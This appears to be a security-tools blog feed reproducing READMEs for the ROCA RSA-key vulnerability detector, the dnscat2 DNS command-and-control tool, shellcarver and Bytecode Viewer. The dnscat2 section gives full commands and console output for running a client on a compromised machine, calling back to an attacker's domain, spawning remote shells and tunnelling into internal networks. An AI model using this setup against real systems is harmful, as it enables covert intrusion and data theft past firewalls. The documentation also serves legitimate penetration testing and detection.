ROCA – Infineon RSA Vulnerability

This tool is related to ACM CCS 2017 conference paper #124 "Return of the Coppersmith's Attack: Practical Factorization of Widely Used RSA Moduli". It enables you to test public RSA keys for the presence of the described vulnerability.

Update: The paper describing the attack is already online (ACM version).

Currently the tool supports the following key formats:

- X509 Certificate, DER encoded, one per file, *.der, *.crt
- X509 Certificate, PEM encoded, more per file, *.pem
- RSA PEM encoded private key, public key, more per file, *.pem (has to have correct header -----BEGIN RSA...)
- SSH public key, *.pub, starting with "ssh-rsa", one per line
- ASC encoded PGP key, *.pgp, *.asc. More per file, has to have correct header -----BEGIN PGP...
- APK android application, *.apk
- one modulus per line text file *.txt, modulus can be a) base64 encoded number, b) hex coded number, c) decimal coded number
- JSON file with moduli, one record per line; a record with a modulus has key "mod" (int, base64, hex, dec encoding supported); certificate(s) with key "cert" / array of certificates with key "certs" are supported, base64 encoded DER.
- LDIFF file – LDAP database dump. Any field ending with ";binary::" is attempted to decode as X509 certificate
- Java Key Store file (JKS). Tries empty password & some common ones, specify more with --jks-pass-file
- PKCS7 signature with user certificate

The detection tool is intentionally a one-file implementation for easy integration / manipulation.

Pip install

Install with pip (installs all dependencies):

    pip install roca-detect

Local install

Execute in the root folder of the package:

    pip install --upgrade --find-links=. .

Dependencies

It may be required to install additional dependencies so pip can install e.g. the cryptography package.

CentOS / RHEL:

    sudo yum install python-devel python-pip gcc gcc-c++ make automake autoreconf libtool openssl-devel libffi-devel dialog

Ubuntu:

    sudo apt-get install python-pip python-dev build-essential libssl-dev libffi-dev swig

Usage

To print the basic usage:

    # If installed with pip / manually
    roca-detect --help

    # Without installation (can miss dependencies)
    python roca/detect.py

The testing tool accepts multiple file names / directories as the input argument. It returns a report showing how many files have been fingerprinted (and which ones).

Example (no vulnerabilities found):

Running recursively on all my SSH keys and known_hosts:

    $> roca-detect ~/.ssh
    2017-10-16 13:39:21 [51272] INFO ### SUMMARY ####################
    2017-10-16 13:39:21 [51272] INFO Records tested: 92
    2017-10-16 13:39:21 [51272] INFO .. PEM certs: . . . 0
    2017-10-16 13:39:21 [51272] INFO .. DER certs: . . . 0
    2017-10-16 13:39:21 [51272] INFO .. RSA key files: . 16
    2017-10-16 13:39:21 [51272] INFO .. PGP master keys: 0
    2017-10-16 13:39:21 [51272] INFO .. PGP total keys: 0
    2017-10-16 13:39:21 [51272] INFO .. SSH keys: . . . 76
    2017-10-16 13:39:21 [51272] INFO .. APK keys: . . . 0
    2017-10-16 13:39:21 [51272] INFO .. JSON keys: . . . 0
    2017-10-16 13:39:21 [51272] INFO .. LDIFF certs: . . 0
    2017-10-16 13:39:21 [51272] INFO .. JKS certs: . . . 0
    2017-10-16 13:39:21 [51272] INFO .. PKCS7: . . . . . 0
    2017-10-16 13:39:21 [51272] INFO No fingerprinted keys found (OK)
    2017-10-16 13:39:21 [51272] INFO ################################

Example (vulnerabilities found):

Running recursively on all my SSH keys and known_hosts:

    $> roca-detect ~/.ssh
    2017-10-16 13:39:21 [51272] WARNING Fingerprint found in the Certificate…
    2017-10-16 13:39:21 [51272] INFO ### SUMMARY ####################
    2017-10-16 13:39:21 [51272] INFO Records tested: 92
    2017-10-16 13:39:21 [51272] INFO .. PEM certs: . . . 0
    2017-10-16 13:39:21 [51272] INFO .. DER certs: . . . 0
    2017-10-16 13:39:21 [51272] INFO .. RSA key files: . 16
    2017-10-16 13:39:21 [51272] INFO .. PGP master keys: 0
    2017-10-16 13:39:21 [51272] INFO .. PGP total keys: 0
    2017-10-16 13:39:21 [51272] INFO .. SSH keys: . . . 76
    2017-10-16 13:39:21 [51272] INFO .. APK keys: . . . 0
    2017-10-16 13:39:21 [51272] INFO .. JSON keys: . . . 0
    2017-10-16 13:39:21 [51272] INFO .. LDIFF certs: . . 0
    2017-10-16 13:39:21 [51272] INFO .. JKS certs: . . . 0
    2017-10-16 13:39:21 [51272] INFO .. PKCS7: . . . . . 0
    2017-10-16 13:39:21 [51272] INFO Fingerprinted keys found: 1
    2017-10-16 13:39:21 [51272] INFO WARNING: Potential vulnerability
    2017-10-16 13:39:21 [51272] INFO ################################

PGP key

In order to test your PGP key you can export it from your email client or download it from a PGP key server. You can also use the gpg command line utility to export your public key:

    gpg --armor --export [email protected] > mykey.asc

Advanced use case

The detection tool extracts information about the key, which can be printed with the --dump flag, for example:

    roca-detect --dump --flatten --indent ~/.ssh/

Advanced installation methods

Virtual environment

It is usually recommended to create a new python virtual environment for the project:

    virtualenv ~/pyenv
    source ~/pyenv/bin/activate
    pip install --upgrade pip
    pip install --upgrade --find-links=. .

Separate Python 2.7.13

We tested the tool with Python 2.7.13 and it works (see Travis for more info).
We have reports saying lower versions (<=2.6) do not work properly, so we highly recommend using an up to date Python 2.7.

Use pyenv to install a new Python version locally if you cannot / don't want to update the system Python. It internally downloads the Python sources and installs them to ~/.pyenv.

    git clone ~/.pyenv
    echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
    echo 'export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
    echo 'eval "$(pyenv init -)"' >> ~/.bashrc
    exec $SHELL
    pyenv install 2.7.13
    pyenv local 2.7.13

Python 3

The basic testing routine is quite simple and works with Py3, but the rest of the code that processes the different key formats and extracts the modulus for inspection is not yet fully py3 ready. We are working on a Py3 compatible version.

Docker container

Run via a Docker container to avoid environment inconsistency. The Dockerfile source can be audited at

    docker run --rm -v /path/to/your/keys:/keys --network none unnawut/roca-detect

Make sure to use the --rm and --network none flags to disable the container's network connection and delete the container after running.

Download ROCA
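The one-modulus-per-line text format listed above, fed to the fingerprint check, as an added Python example (this is not roca-detect's own code). The page does not spell out the fingerprint; the criterion used here is the one published in the CCS 2017 paper (N mod p must lie in the subgroup generated by 65537 for every small prime p), the encoding-detection order for a text line is this example's own assumption, and the two sample moduli are constructed, not real keys.

```python
"""Parse a roca-detect style *.txt input line and apply the ROCA fingerprint.

Moduli produced by the affected library satisfy  N mod p in <65537>  (the
subgroup generated by 65537 modulo p) for every small prime p, so a key is
flagged only when that holds for all of them.  Added example, not the tool's
code; sample moduli below are constructed."""
import base64
import string

# First 39 primes (2..167), the range the published fingerprint checks.
SMALL_PRIMES = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53,
                59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113,
                127, 131, 137, 139, 149, 151, 157, 163, 167]
GENERATOR = 65537


def parse_modulus(line):
    """Decode one text line as a) base64, b) hex or c) decimal modulus.

    Decision order (an assumption of this example): a 0x prefix means hex,
    digits only means decimal, hex digits only means hex, anything else is
    base64 of the big-endian modulus bytes.
    """
    s = line.strip()
    if not s:
        raise ValueError("empty line")
    if s.lower().startswith("0x"):
        return int(s[2:], 16)
    if s.isdigit():
        return int(s, 10)
    if all(c in string.hexdigits for c in s):
        return int(s, 16)
    raw = base64.b64decode(s, validate=True)
    return int.from_bytes(raw, "big")


def allowed_residues(p):
    """Residues of <65537> modulo p, i.e. {65537^k mod p : k >= 0}."""
    seen, x = set(), 1
    while x not in seen:
        seen.add(x)
        x = (x * GENERATOR) % p
    return seen


_ALLOWED = {p: allowed_residues(p) for p in SMALL_PRIMES}


def has_roca_fingerprint(n):
    """True when N mod p lies in <65537> for every small prime p."""
    return all(n % p in _ALLOWED[p] for p in SMALL_PRIMES)


def scan_lines(lines):
    """Return [(line_number, modulus, flagged)] for a text-file input."""
    results = []
    for i, line in enumerate(lines, 1):
        if not line.strip():
            continue  # blank lines carry no modulus
        n = parse_modulus(line)
        results.append((i, n, has_roca_fingerprint(n)))
    return results


# Constructed test vectors.  A value congruent to 65537^k modulo the product
# of the small primes has the fingerprint by construction; 2^1024 + 3 does not
# (e.g. (2^1024 + 3) mod 11 == 8, while <65537> mod 11 is only {1, 10}).
_M = 1
for _p in SMALL_PRIMES:
    _M *= _p
VULNERABLE_LIKE = pow(GENERATOR, 12345, _M)
SAFE_LIKE = (1 << 1024) + 3

if __name__ == "__main__":
    sample = [hex(VULNERABLE_LIKE), str(SAFE_LIKE),
              base64.b64encode(SAFE_LIKE.to_bytes(129, "big")).decode()]
    for lineno, n, flagged in scan_lines(sample):
        print(lineno, n.bit_length(), "bits",
              "FINGERPRINTED" if flagged else "ok")
```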


ROCA – Infineon RSA key vulnerability.

The ROCA vulnerability has been discovered by researchers at Masaryk University (Brno, Czech Republic). As two of the researchers are also affiliated with Enigma Bridge…


dnscat2 – Create an Encrypted Command & Control (C&C) Channel over the DNS Protocol

dnscat2 is a DNS tunnel that WON'T make you sick and kill you!

This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol, which is an effective tunnel out of almost every network.

This README file should contain everything you need to get up and running! If you're interested in digging deeper into the protocol, how the code is structured, future plans, or other esoteric stuff, check out the doc/ folder.

Overview

dnscat2 comes in two parts: the client and the server.

The client is designed to be run on a compromised machine. It's written in C and has the minimum possible dependencies. It should run just about anywhere (if you find a system where it doesn't compile or run, please file a ticket, particularly if you can help me get access to said system).

When you run the client, you typically specify a domain name. All requests will be sent to the local DNS server, which are then redirected to the authoritative DNS server for that domain (which you, presumably, have control of).

If you don't have an authoritative DNS server, you can also use direct connections on UDP/53 (or whatever you choose). They'll be faster, and still look like DNS traffic to the casual viewer, but it's much more obvious in a packet log (all domains are prefixed with "dnscat.", unless you hack the source). This mode will frequently be blocked by firewalls.

The server is designed to be run on an authoritative DNS server. It's in ruby, and depends on several different gems. When you run it, much like the client, you specify which domain(s) it should listen for in addition to listening for messages sent directly to it on UDP/53. When it receives traffic for one of those domains, it attempts to establish a logical connection.
If it receives other traffic, it ignores it by default, but can also forward it upstream.

Detailed instructions for both parts are below.

How is this different from .....

dnscat2 strives to be different from other DNS tunneling protocols by being designed for a special purpose: command and control.

This isn't designed to get you off a hotel network, or to get free Internet on a plane. And it doesn't just tunnel TCP.

It can tunnel any data, with no protocol attached. Which means it can upload and download files, it can run a shell, and it can do those things well. It can also potentially tunnel TCP, but that's only going to be added in the context of a pen-testing tool (that is, tunneling TCP into a network), not as a general purpose tunneling tool. That's been done, it's not interesting (to me).

It's also encrypted by default. I don't believe any other public DNS tunnel encrypts all traffic!

How to play

The theory behind dnscat2 is simple: it creates a tunnel over the DNS protocol.

Why? Because DNS has an amazing property: it'll make its way from server to server until it figures out where it's supposed to go.

That means that for dnscat to get traffic off a secure network, it simply has to send messages to a DNS server, which will happily forward things through the DNS network until it gets to your DNS server.

That, of course, assumes you have access to an authoritative DNS server. dnscat2 also supports "direct" connections – that is, running a dnscat client that directly connects to your dnscat on your ip address and UDP port 53 (by default). The traffic still looks like DNS traffic, and might get past dumber IDS/IPS systems, but is still likely to be stopped by firewalls.

If you aren't clear on how to set up an authoritative DNS server, it's something you have to set up with a domain provider.
izhan helpfully wrote one for you!

Compiling

Client

Compiling the client should be pretty straightforward – all you should need to compile is make/gcc (for Linux) or either Cygwin or Microsoft Visual Studio (for Windows). Here are the commands on Linux:

    $ git clone
    $ cd dnscat2/client/
    $ make

On Windows, load client/win32/dnscat2.vcproj into Visual Studio and hit "build". I created and test it on Visual Studio 2008 – until I get a free legit copy of a newer version, I'll likely be sticking with that one. :)

If compilation fails, please file a bug on my github page! Please send details about your system.

You can verify dnscat2 is successfully compiled by running it with no flags; you'll see it attempting to start a DNS tunnel with whatever your configured DNS server is (which will fail):

    $ ./dnscat
    Starting DNS driver without a domain! This will only work if you
    are directly connecting to the dnscat2 server.

    You'll need to use --dns server= if you aren't.

    ** WARNING!
    *
    * It looks like you're running dnscat2 with the system DNS server,
    * and no domain name!
    *
    * That's cool, I'm not going to stop you, but the odds are really,
    * really high that this won't work. You either need to provide a
    * domain to use DNS resolution (requires an authoritative server):
    *
    *     dnscat
    *
    * Or you have to provide a server to connect directly to:
    *
    *     dnscat --dns=server=,port=53
    *
    * I'm going to let this keep running, but once again, this likely
    * isn't what you want!
    *
    ** WARNING!

    Creating DNS driver:
     domain = (null)
     host =
     port = 53
     type = TXT,CNAME,MX
     server =

    [[ ERROR ]] :: DNS: RCODE_NAME_ERROR
    [[ ERROR ]] :: DNS: RCODE_NAME_ERROR
    [[ ERROR ]] :: DNS: RCODE_NAME_ERROR
    [[ ERROR ]] :: DNS: RCODE_NAME_ERROR
    [[ ERROR ]] :: DNS: RCODE_NAME_ERROR
    [[ ERROR ]] :: DNS: RCODE_NAME_ERROR
    [[ ERROR ]] :: DNS: RCODE_NAME_ERROR
    [[ ERROR ]] :: DNS: RCODE_NAME_ERROR
    [[ ERROR ]] :: DNS: RCODE_NAME_ERROR
    [[ ERROR ]] :: DNS: RCODE_NAME_ERROR
    [[ ERROR ]] :: The server hasn't returned a valid response in the last 10 attempts.. closing session.
    [[ FATAL ]] :: There are no active sessions left! Goodbye!
    [[ WARNING ]] :: Terminating

Server

The server isn't "compiled", as such, but it does require some Ruby dependencies. Unfortunately, Ruby dependencies can be annoying to get working, so good luck! If any Ruby experts out there want to help make this section better, I'd be grateful!

I'm assuming you have Ruby and Gem installed and in working order. If they aren't, install them with either apt-get, emerge, rvm, or however is normal on your operating system.

Once Ruby/Gem are sorted out, run these commands (note: you can obviously skip the git clone command if you already installed the client, and skip gem install bundler if you've already installed bundler):

    $ git clone
    $ cd dnscat2/server/
    $ gem install bundler
    $ bundle install

If you get a permissions error with gem install bundler or bundle install, you may need to run them as root. If you have a lot of problems, uninstall Ruby/Gem and install everything using rvm and without root.

If you get an error that looks like this:

    /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36:in `require': cannot load such file -- mkmf (LoadError)

It means you need to install the -dev version of Ruby:

    $ sudo apt-get install ruby-dev

I find that sudo isn't always enough to get everything working right; I sometimes have to switch to root and work directly as that account. rvmsudo doesn't help, because it breaks ctrl-z.

You can verify the server is working by running it with no flags and seeing if you get a dnscat2> prompt:

    # ruby ./dnscat2.rb
    New window created: 0
    Welcome to dnscat2!
    Some documentation may be out of date.

    passthrough => disabled
    auto_attach => false
    auto_command =>
    process =>
    history_size (for new windows) => 1000
    New window created: dns1
    Starting Dnscat2 DNS server on
    [domains = n/a]...

    It looks like you didn't give me any domains to recognize!
    That's cool, though, you can still use direct queries,
    although those are less stealthy.

    To talk directly to the server without a domain name, run:
      ./dnscat2 --dns server=x.x.x.x,port=53

    Of course, you have to figure out <server> yourself! Clients
    will connect directly on UDP port 53.

    dnscat2>

If you don't run it as root, you might have trouble listening on UDP/53 (you can use --dnsport to change it). You'll see an error message if that's the case.

Ruby as root

If you're having trouble running Ruby as root, this is what I do to run it the first time:

    $ cd dnscat2/server
    $ su
    # gpg --keyserver hkp:// --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
    # \curl -sSL | bash
    # source /etc/profile.d/
    # rvm install 1.9
    # rvm use 1.9
    # bundle install
    # ruby ./dnscat2.rb

And subsequent times:

    $ cd dnscat2/server
    $ su
    # source /etc/profile.d/
    # ruby ./dnscat2.rb

rvmsudo should make it easier, but dnscat2 doesn't play well with rvmsudo unfortunately.

Usage

Client + server

Before we talk about how to specifically use the tools, let's talk about how dnscat is structured. The dnscat tool is divided into two pieces: a client and a server. As you noticed if you went through the compilation, the client is written in C and the server is in Ruby.

Generally, the server is run first. It can be long lived, and handle as many clients as you'd like. As I said before, it's basically a C&C service.

Later, a client is run, which opens a session with the server (more on sessions below). The session can either traverse the DNS hierarchy (recommended, but more complex) or connect directly to the server. Traversing the DNS hierarchy requires an authoritative domain, but will bypass most firewalls.
Connecting directly to the server is more obvious for several reasons.

By default, connections are automatically encrypted (turn it off on the client with --no-encryption and on the server with --security=open). When establishing a new connection, if you're paranoid about man-in-the-middle attacks, you have two options for verifying the peer:

- Pass a pre-shared secret using the --secret argument on both sides to validate the connection
- Manually verify the "short authentication string" – a series of words that are printed on both the client and server after encryption is negotiated

Running a server

The server – which is typically run on the authoritative DNS server for a particular domain – is designed to be feature-ful, interactive, and user friendly. It's written in Ruby, and much of its design is inspired by Metasploit and Meterpreter.

If you followed the compilation instructions above, you should be able to just run the server:

    $ ruby ./dnscat2.rb skullseclabs.org

Where "skullseclabs.org" is your own domain. If you don't have an authoritative DNS server, it isn't mandatory; but this tool works way, way better with an authoritative server.

That should actually be all you need! Other than that, you can test it using the client's --ping command on any other system, which should be available if you've compiled it:

    $ ./dnscat --ping skullseclabs.org

If the ping succeeds, your C&C server is probably good! If you ran the DNS server on a different port, or if you need to use a custom DNS resolver, you can use the --dns flag in addition to --ping:

    $ ./dnscat --dns server=, --ping
    $ ./dnscat --dns port=53531,server=localhost, --ping

Note that when you specify a --dns argument, the domain has to be part of that argument (as domain=xxx).
You can't just pass it on the commandline (due to a limitation of my command parsing; I'll likely improve that in a future release).

When the process is running, you can start a new server using basically the exact same syntax:

    dnscat2> start --dns=port=53532,,domain=test.com
    New window created: dns2
    Starting Dnscat2 DNS server on
    [domains = ,]...

    Assuming you have an authoritative DNS server, you can run
    the client anywhere with the following:
      ./dnscat2
      ./dnscat2 test.com

    To talk directly to the server without a domain name, run:
      ./dnscat2 --dns server=x.x.x.x,port=53532

    Of course, you have to figure out <server> yourself! Clients
    will connect directly on UDP port 53532.

You can run as many DNS listeners as you want, as long as they're on different hosts/ports. Once the data comes in, the rest of the process doesn't even know which listener the data came from; in fact, a client can send different packets to different ports, and the session will continue as expected.

Running a client

The client – which is typically run on a system after compromising it – is designed to be simple, stable, and portable. It's written in C and has as few library dependencies as possible, and compiles/runs natively on Linux, Windows, Cygwin, FreeBSD, and Mac OS X.

The client is given the domain name on the commandline, for example:

    ./dnscat2 skullseclabs.org

In that example, it will create a C&C session with the dnscat2 server running on skullseclabs.org. If an authoritative domain isn't an option, it can be given a specific ip address to connect to instead:

    ./dnscat2 --dns host=,port=5353

Assuming there's a dnscat2 server running on that host/port, it'll create a session there.

Tunnels

Yo dawg; I hear you like tunnels, so now you can tunnel a tunnel through your tunnel!

It is currently possible to tunnel a connection through dnscat2, similar to "ssh -L"! Other modes ("ssh -D" and "ssh -R") are coming soon as well!

After a session has started (a command session), the command "listen" is used to open a new tunnelled port.
The syntax is roughly the same as ssh -L:

    listen [lhost:]lport rhost:rport

The local host is optional, and will default to all interfaces. The local port and remote host/port are mandatory.

The dnscat2 server will listen on lport. All connections received on that port are forwarded, via the dnscat2 client, to the remote host/port chosen.

For example, this will listen on port 4444 (on the server) and forward traffic to google:

    listen 4444

Now, if you connect to http://localhost:4444, it'll come out the dnscat2 client and connect to google.

Let's say you're using this on a pentest and you want to forward ssh connections through the dnscat2 client (running on somebody's corp network) to an internal device. You can!

    listen

That'll only listen on the localhost interface on the dnscat2 server, and will forward connections via the tunnel to port 22 of the internal device.

Encryption

dnscat2 is encrypted by default.

I'm not a cryptographer, and by necessity I came up with the encryption scheme myself. As a result, I wouldn't trust this 100%. I think I did a pretty good job preventing attacks, but this hasn't been professionally audited. Use with caution.

There is a ton of technical information about the encryption in the protocol doc. But here are the basics.

By default, both the client and the server support and will attempt encryption. Each connection uses a new keypair, negotiated by ECDH. All encryption is done by salsa20, and signatures use sha3.

Encryption can be disabled on the client by passing --no-encryption on the commandline, or by compiling it using make nocrypto.

The server will reject unencrypted connections by default. To allow unencrypted connections, pass --security=open to the server, or run set security=open on the console.

By default, there's no protection against man-in-the-middle attacks.
As mentioned before, there are two different ways to gain MitM protection: a pre-shared secret or a "short authentication string".

A pre-shared secret is passed on the commandline to both the client and the server, and is used to authenticate both the client to the server and the server to the client. It should be a somewhat strong value – something that can't be quickly guessed by an attacker (there's only a short window for the attacker to guess it, so it only has to hold up for a few seconds).

The pre-shared secret is passed in via the --secret parameter on both the client and the server. The server can change it at runtime using set secret=<new value>, but that can have unexpected results if active clients are connected.

Furthermore, the server can enforce that only authenticated connections are allowed by using --security=authenticated or set security=authenticated. That's enabled by default if you pass the --secret parameter.

If you don't require the extra effort of authenticating connections, then a "short authentication string" is displayed by both the client and the server. The short authentication string is a series of English words that are derived from the secret values that both sides share.

If the same set of English words is printed on both the client and the server, the connection can be reasonably considered to be secure.

That's about all you need to know about the encryption! See the protocol doc for details! I'd love to hear any feedback on the crypto, as well. :)

And finally, if you have any problems with the crypto, please let me know! By default a window called "crypto-debug" will be created at the start. If you have encryption problems, please send me that log! Or, better yet, run dnscat2 with the --firehose and --packet-trace arguments, and send me EVERYTHING! Don't worry about revealing private keys; they're only used for that one session.

dnscat2's Windows

The dnscat2 UI is made up of a bunch of windows. The default window is called the 'main' window.
You can get a list of windows by typing windows (or sessions) into any command prompt:

    dnscat2> windows
    0 :: main [active]
      dns1 :: DNS Driver running on domains = [*]

You'll note that there are two windows – window 0 is the main window, and window dns1 is the listener (technically referred to as the 'tunnel driver').

From any window that accepts commands (main and command sessions), you can type help to get a list of commands:

    dnscat2> help

    Here is a list of commands (use -h on any of them for additional help):
    * echo
    * help
    * kill
    * quit
    * set
    * start
    * stop
    * tunnels
    * unset
    * window
    * windows

For any of those commands, you can use -h or --help to get details:

    dnscat2> window --help
    Error: The user requested help

    Interact with a window
      -i, --i=<s>    Interact with the chosen window
      -h, --help     Show this message

We'll use the window command to interact with dns1, which is a status window:

    dnscat2> window -i dns1
    New window created: dns1
    Starting Dnscat2 DNS server on
    [domains = ]...

    Assuming you have an authoritative DNS server, you can run
    the client anywhere with the following:
      ./dnscat2 skullseclabs.org

    To talk directly to the server without a domain name, run:
      ./dnscat2 --dns server=x.x.x.x,port=53531

    Of course, you have to figure out <server> yourself! Clients
    will connect directly on UDP port 53531.

    Received: dnscat.9fa0ff178f72686d6c716c6376697968657a6d716800 (TXT)
    Sending: 9fa0ff178f72686d6c716c6376697968657a6d716800
    Received: (MX)
    Sending: d17cff3e747073776c776d70656b73786f646f616200.skullseclabs.org

The received and sent strings there are, if you decode them, pings.

You can switch to the 'parent' window (in this case, main) by pressing ctrl-z.
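Decoding those two ping names, as an added Python example for anyone reviewing resolver logs (this is not part of the dnscat2 project). It assumes the header layout from dnscat2's doc/protocol.md, packet_id (uint16, big-endian), message_type (uint8) and session_id (uint16), followed for a PING (0xFF) by a NUL-terminated data string; the sample names are the ones printed in the dns1 window above, and the "dnscat." prefix / tunnel-domain suffix handling mirrors the two modes described earlier.

```python
"""Decode dnscat2 packet headers carried as hex labels in DNS query names.

Added example, not dnscat2's own code.  Header layout (per doc/protocol.md):
  packet_id (uint16 BE) | message_type (uint8) | session_id (uint16 BE)
PING (0xFF) then carries a NUL-terminated data string."""
import struct

MESSAGE_TYPES = {0x00: "SYN", 0x01: "MSG", 0x02: "FIN", 0xFF: "PING"}


def hex_payload_from_name(qname, domain=None):
    """Return the hex text hidden in a query name.

    Direct mode prefixes the name with 'dnscat.'; authoritative mode appends
    the tunnel domain instead.  Remaining labels are joined, because long
    payloads are split across several 63-byte labels."""
    labels = qname.rstrip(".").split(".")
    if domain:
        suffix = domain.rstrip(".").split(".")
        if labels[-len(suffix):] != suffix:
            raise ValueError("name is not under the tunnel domain")
        labels = labels[:-len(suffix)]
    elif labels and labels[0].lower() == "dnscat":
        labels = labels[1:]
    return "".join(labels)


def parse_packet(payload):
    """Parse the 5-byte dnscat2 header and, for PING, the data field."""
    if len(payload) < 5:
        raise ValueError("too short for a dnscat2 header")
    packet_id, msg_type, session_id = struct.unpack(">HBH", payload[:5])
    body = payload[5:]
    parsed = {
        "packet_id": packet_id,
        "type": MESSAGE_TYPES.get(msg_type, "UNKNOWN(0x%02x)" % msg_type),
        "session_id": session_id,
    }
    if msg_type == 0xFF:
        nul = body.find(b"\x00")
        data = body if nul < 0 else body[:nul]
        parsed["data"] = data.decode("ascii", "replace")
    else:
        parsed["raw_body"] = body  # SYN/MSG/FIN bodies are out of scope here
    return parsed


def decode_query(qname, domain=None):
    """Convenience wrapper: query name -> parsed header dict."""
    return parse_packet(bytes.fromhex(hex_payload_from_name(qname, domain)))


# The two names shown in the dns1 window (copied from the page).
SAMPLE_DIRECT = "dnscat.9fa0ff178f72686d6c716c6376697968657a6d716800"
SAMPLE_DOMAIN = "d17cff3e747073776c776d70656b73786f646f616200.skullseclabs.org"

if __name__ == "__main__":
    print(decode_query(SAMPLE_DIRECT))
    print(decode_query(SAMPLE_DOMAIN, domain="skullseclabs.org"))
```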
If ctrl-z kills the process, then you probably have to find a better way to run it (rvmsudo doesn't work, see above).

When a new client connects and creates a session, you'll be notified in main (and certain other windows):

    New window created: 1
    dnscat2>

(Note that you have to press enter to get the prompt back)

You can switch to the new window the same way we switched to the dns1 status window:

    dnscat2> window -i 1
    New window created: 1
    history_size (session) => 1000
    This is a command session!

    That means you can enter a dnscat2 command such as
    'ping'! For a full list of clients, try 'help'.

    command session (ubuntu-64) 1>

Command sessions can spawn additional sessions; for example, the shell command:

    command session (ubuntu-64) 1> shell
    Sent request to execute a shell
    New window created: 2
    Shell session created!
    command session (ubuntu-64) 1>

(Note that throughout this document I'm cleaning up the output; usually you have to press enter to get the prompt back)

Then, if you return to the main session (ctrl-z or suspend), you'll see it in the list of windows:

    dnscat2> windows
    0 :: main [active]
      dns1 :: DNS Driver running on domains = [*]
      1 :: command session (ubuntu-64)
      2 :: sh (ubuntu-64) [*]

Unfortunately, the 'windows' command in a specific command session only shows child windows from that session, and right now new sessions aren't spawned as children.

Note that some sessions have [*] – that means that there's been activity since the last time we looked at them.

When you interact with a session, the interface will look different depending on the session type. As you saw with the default session type (command sessions) you get a UI just like the top-level session (you can type 'help' or run commands or whatever).
However, if you interact with a 'shell' session, you won't see much immediately, until you type a command:

    dnscat2> windows
    0 :: main [active]
      dns1 :: DNS Driver running on domains = [*]
      1 :: command session (ubuntu-64)
      2 :: sh (ubuntu-64) [*]

    dnscat2> session -i 2
    New window created: 2
    history_size (session) => 1000
    This is a console session!

    That means that anything you type will be sent as-is to the
    client, and anything they type will be displayed as-is on the
    screen! If the client is executing a command and you don't
    see a prompt, try typing 'pwd' or something!

    To go back, type ctrl-z.

    sh (ubuntu-64) 2> pwd
    /home/ron/tools/dnscat2/client

To escape this, you can use ctrl-z or type "exit" (which will kill the session).

Lastly, to kill a session, the kill command can be used:

    dnscat2> windows
    0 :: main [active]
      dns1 :: DNS Driver running on domains = [*]
      1 :: command session (ubuntu-64)
      2 :: sh (ubuntu-64) [*]

    dnscat2> kill 2
    Session 2 has been sent the kill signal!
    Session 2 has been killed

    dnscat2> windows
    0 :: main [active]
      dns1 :: DNS Driver running on domains = [*]
      1 :: command session (ubuntu-64)

Download dnscat2


shellcarver – Carve shellcode within the memory using restrictive character set.

shellcarver carves shellcode within memory using a restrictive character set. Purpose: To calculate possible sub eax statements to help assist in carving code…


Bytecode Viewer – A Java 8 Jar & Android Apk Reverse Engineering Suite (Decompiler, Editor, Debugger & More)

Bytecode Viewer is an Advanced Lightweight Java Bytecode Viewer, GUI Java Decompiler, GUI Bytecode Editor, GUI Smali, GUI Baksmali, GUI APK Editor, GUI Dex Editor, GUI APK Decompiler, GUI DEX Decompiler, GUI Procyon Java Decompiler, GUI Krakatau, GUI CFR Java Decompiler, GUI FernFlower Java Decompiler, GUI DEX2Jar, GUI Jar2DEX, GUI Jar-Jar, Hex Viewer, Code Searcher, Debugger and more.

It's written completely in Java, and it's open sourced. It's currently being maintained and developed by Konloch.

There is also a plugin system that will allow you to interact with the loaded classfiles; for example you can write a String deobfuscator, a malicious code searcher, or something else you can think of.

You can either use one of the pre-written plugins, or write your own. It supports groovy scripting.
Once a plugin is activated, it will execute the plugin with a ClassNode ArrayList of every single class loaded in BCV, this allows the user to handle it completely using ASM.Code from various projects has been used, including but not limited to:    J-RET by WaterWolf    JHexPane by Sam Koivu    RSynaxPane by Robert Futrell    Commons IO by Apache    ASM by OW2    FernFlower by Stiver    Procyon by Mstrobel    CFR by Lee Benfield    CFIDE by Bibl    Smali by JesusFreke    Dex2Jar by pxb1..?    Krakatau by Storyyeller    JD GUI/JD Core by The Java-Decompiler Team    Enjarify by StoryyellerFeatures:Easy to use yet extremely effective.Written to run on Java 7, supports Java 8.Compile Decompiled Java classes with Ranino Compiler.Quickly decompile classes using JD-Core.Easily edit APKs via Smali/Baksmali integration.Java Decompiling with five different decompilers (DJ-GUI/Core, Procyon, CFR, Fernflower and Krakatau).Bytecode Decompiling with CFIDE.Android APK integrated with Dex2Jar.Securely launch Java applications and insert hooks via EZ-Injection.Scan for malicious code with the Malicious Code Scanner plugin.Export as DEX, Jar, Class, Zip or Java Source File.Open Android APKs, Android DEX, Java Class Files and Java Jars.Extensively configurable, over 100+ settings!Works seamlessly with all Operating Systems.Integrate BCV into Windows by installing it, it’ll associate all .class, .dex and .apk to open with BCV.View Jar & APK Resources with ease by APKTool.jar integration.100% free and open sourced under GPL v3 CopyLeft.Video:Download Bytecode Viewer</p> <p><img class="feed-img" src="" /></p> <p>Link: <a href=""></a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-49940" class="post-49940 post type-post status-publish format-standard hentry category-uncategorized tag-communications tag-decode tag-firewall tag-ftp tag-penetration-test tag-sniffer tag-spoofing"> <div class="top-category"><i class="fa fa-tag"></i> <span 
